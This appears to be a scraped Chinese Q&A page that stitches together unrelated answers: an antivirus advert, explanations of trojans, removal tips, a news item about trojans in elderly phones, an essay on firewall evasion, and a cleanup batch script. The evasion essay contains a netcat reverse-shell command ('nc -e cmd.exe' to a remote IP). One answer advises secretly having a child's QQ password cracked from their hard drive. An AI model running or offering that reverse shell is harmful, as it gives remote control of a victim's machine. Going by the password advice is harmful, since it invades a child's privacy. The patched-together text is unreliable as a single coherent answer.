腾讯电脑管家可以试试:
1、腾讯电脑管家独有的二代反病毒引擎,防护查杀更彻底
2、腾讯电脑管家拥有全球最大的云库平台,能更好的识别诈骗、钓鱼网站
3、腾讯电脑管家独创鹰眼模式,时刻保护您的爱机不受侵害
4、腾讯电脑管家独有的安全等级,您可以时刻查看你爱机的安全状态
5、新增广告过滤功能,有效减轻广告骚扰。
分类: 电脑/网络 反病毒
解析:
什么是木马?
木马,其实质只是一个网络客户/服务程序。网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序称为守护进程。就我们前面所讲的木马来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供服务。
不一定吧,不知道你具体问什么,转载了下别人的~希望有帮助
特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。
及时更新系统补丁,不接受、不运行来历不明的文件,不点击来历不明的链接,不浏览“诱人”的网页。安装并及时升级专业的“木马”查杀工具,开启实时监控,禁止U盘的自动运行。检查系统的自启功能,取消可疑的和不需要的程序自启动。将系统启动到安全模式,删除感染“木马”的文件。对于捆绑在系统文件中的“木马”程序,应从其他系统拷贝同名文件覆盖被捆绑了“木马”的文件。
随着病毒编写技术的发展,木马程式对使用者的威胁越来越大,尤其是一些木马程式采用了极其狡猾的手段来隐蔽自己,使普通使用者很难在中毒后发觉,我教你一些清理木马病毒的相关知识吧。
一、档案捆绑检测
将木马捆绑在正常程式中,一直是木马伪装攻击的一种常用手段。下面我们就看看如何才能检测出档案中捆绑的木马。
1.MT捆绑克星
档案中只要捆绑了木马,那么其档案头特征码一定会表现出一定的规律,而MT捆绑克星正是通过分析程式的档案头特征码来判断的。程式执行后,我们只要单击“浏览”按钮,选择需要进行检测的档案,然后单击主介面上的“分析”按钮,这样程式就会自动对新增进来的档案进行分析。此时,我们只要检视分析结果中可执行的头部数,如果有两个或更多的可执行档案头部,那么说明此档案一定是被捆绑过的!
这些木马病毒是植入老人机手机的主板里面,只要购买手机之后,把电话卡插到老人机里面,木马程序就会获得手机里面的电话号码,个人信息等,而且这些木马程序还能够自动的拦截验证,把这个验证码传到植入木马的网络公司后台数据库。制作木马程序的科技公司和生产手机的公司进行合作,所以导致330万台老年机都被植入了木马病毒。制作木马病毒公司的吴某被判有期徒刑4年6个月,并处罚金60万,他通过违法所得的616万也将被追缴。其他非法犯罪的人也得到了法律的处罚。
网上没人教你的...如果真的那么容易破解密码.."电脑黑客"就没饭吃了
你可以试试把他经常上QQ的那台电脑的"硬盘"拆下来.拿去 电脑城.让人给你破解,密码.....自己很难搞的...有钱就好办事....电脑城高手多的很.
不过提醒你..如果让孩子知道你偷看过他的东西...他以后会更反叛...经常去网吧.那时候就更糟了...所以怎样都好...知道他的想法以后.只能慢慢教育他.也不能让他知道你看过....
木马,全称为:特洛伊木马(Trojan Horse)。 “特洛伊木马”这一词最早出先在希腊神话传说中。相传在3000年前,在一次希腊战争中。麦尼劳斯(人名)派兵讨伐特洛伊(王国),但久攻不下。他们想出了一个主意:首先他们假装被打败,然后留下一个木马。而木马里面却藏着最强悍的勇士!最后等时间一到,木马里的勇士全部冲出来把敌人打败了! "木马”的含义就是把预谋的功能隐藏在公开的功能里,掩饰真正的企图。 木马其实就是那些盗号者所制造的一些恶意程序。当木马植入了你的电脑后,电脑就会被监控起来。严重的,木马制作者可以像操作自己的机器一样控制您的机器,甚至可以远程监控您的所有操作。一举一动,都在别人的眼皮底下进行。
rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?) 2. 端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了) 道高一尺,魔高一丈.: 你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截) 使用工具netcat就可以穿刺这种防火墙 : nc -e cmd.exe 远程ip 远程监听port 随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等 典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac ) 还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活) 典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制) 典型的如ntrootkit采用了自定义协议技术. 3.应用程序筛选.(只允许特定程序访问网络) 木马也不甘落后,自己不能访问网络,只好寄人篱下: 进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入 现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等. 4.协议筛选. (例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-) 使用这种技术的有pcshare(使用双向http隧道传输) 5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了: 比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去! 可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵 6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密. 但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用. 同时,综合利用以上对抗技术的木马也不鲜见了.木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展.呵呵
试试AUTO病毒专杀_RavMonE killer
文件在杀毒软件列表里
或者将以下的英文复制到记事本中,另存为sxs2.bat,双击运行即可
@echo
attrib -h -r -s c:\sxs2.exe
del c:\sxs2.exe
attrib -h -s -r c:\autorun.inf
del c:\autorun.inf
